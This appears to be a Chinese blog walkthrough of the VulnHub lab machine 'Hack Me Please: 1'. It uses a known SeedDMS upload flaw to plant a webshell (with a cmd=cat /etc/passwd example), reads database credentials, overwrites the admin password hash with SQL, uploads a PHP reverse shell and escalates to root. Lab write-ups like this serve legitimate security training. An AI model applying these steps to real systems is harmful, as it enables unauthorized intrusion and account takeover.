vulnhub刷題記錄(Hack Me Please: 1)
- 英文名稱 :Hack Me Please: 1
- 中文名稱 :請黑我:1
- 釋出日期 :2021 年 7 月 31 日
- 難度 :容易
- 描述 :一個完全為 OSCP 製作的簡單盒子。不需要蠻力。目標:獲取root shell
- 下載地址 :
http://www.vulnhub.com/entry/hack-me-please-1,731/
1、開機(Ubuntu_CTF)
2、主機發現(192.168.199.109)
3、埠掃描(80、3306)
4、web首頁
Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker." -Emmanuel Goldstein 大多數黑客都很年輕,因為年輕人往往適應能力強。 只要你保持適應能力,你就永遠可以成為一名優秀的黑客。 ——伊曼紐爾·戈德斯坦
5、檢視原始碼,在js註釋中找到線索
6、訪問頁面
7、查詢漏洞
searchsploit SeedDMS
8、檢視漏洞簡介
發現需要登入之後,才能利用檔案上傳漏洞
─# find / -name "47022.txt" 2>/dev/null /usr/share/exploitdb/exploits/php/webapps/47022.txt Step 1: Login to the application and under any folder add a document. 登入到應用程式並在任何資料夾下新增一個文件。 Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used. 選擇文件作為簡單的 php 後門檔案,或者可以使用任何後門/webshell。 Step 3: Now after uploading the file check the document id corresponding to the document. 現在上傳檔案後檢查與文件對應的文件ID。 Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser. 現在轉到 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd 以在瀏覽器中獲取命令響應。 Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved. 注意:這裡的“data”和“1048576”是儲存上傳檔案的預設資料夾。
9、在conf/settings.xml中發現mysql的使用者名稱密碼
dbDatabase="seeddms" dbUser="seeddms" dbPass="seeddms"
10、登入mysql,檢視web的使用者名稱密碼,發現登入不成功
use seeddms; show tables; select * from users; +-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+
10、繼續檢視 tblUsers 表,找到admin的pwd
11、線上破解md5,快如閃電(undefined應該是解密失敗,尷尬),發現還是無法登入
undefined
12、篡改md5值
└─# echo -n 'ailx10'|md5sum|cut -d ' ' -f1 83b70504e0d8742dd5b66e6962eb8a35 update tblUsers set pwd="83b70504e0d8742dd5b66e6962eb8a35" where login="admin"; select login,pwd from tblUsers;
13、繼續登入
14、上傳反彈shell
使用kali自帶的php反彈shell指令碼,使用kali自帶的php反彈shell指令碼,使用kali自帶的php反彈shell指令碼
15、本地監聽,再點選web頁面的反彈shell
16、切換使用者,使用users表中的使用者名稱密碼,sudo獲得root許可權
select * from users; +-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+
到此,實驗完成~
參考
- md5破解 http://pmd5.com/
「其他文章」
- vulnhub刷題記錄(hacksudo: L.P.E.)-增2
- vulnhub刷題記錄(hacksudo: L.P.E.)-增1
- ailx10的專欄電子書
- vulnhub刷題記錄(Funbox:Lunchbreaker)
- vulnhub刷題記錄(HACKABLE: II)
- vulnhub刷題記錄(Hack Me Please: 1)
- vulnhub刷題記錄(EVILBOX: ONE)
- vulnhub刷題記錄(Deathnote: 1)
- vulnhub刷題記錄(Dripping Blues: 1)
- vulnhub刷題記錄(ICA: 1)
- vulnhub刷題記錄(The Planets: Earth)
- 手機監控有什麼危害?
- SIEM和XDR下的安全分析小感悟
- 你的手機曾經被監控過嗎?
- 如何正則匹配亂碼?
- portmap 埠轉發
- socat 埠轉發
- 電腦監控是真的嗎?4個實驗一探究竟
- ufw 埠轉發
- SSH本地埠轉發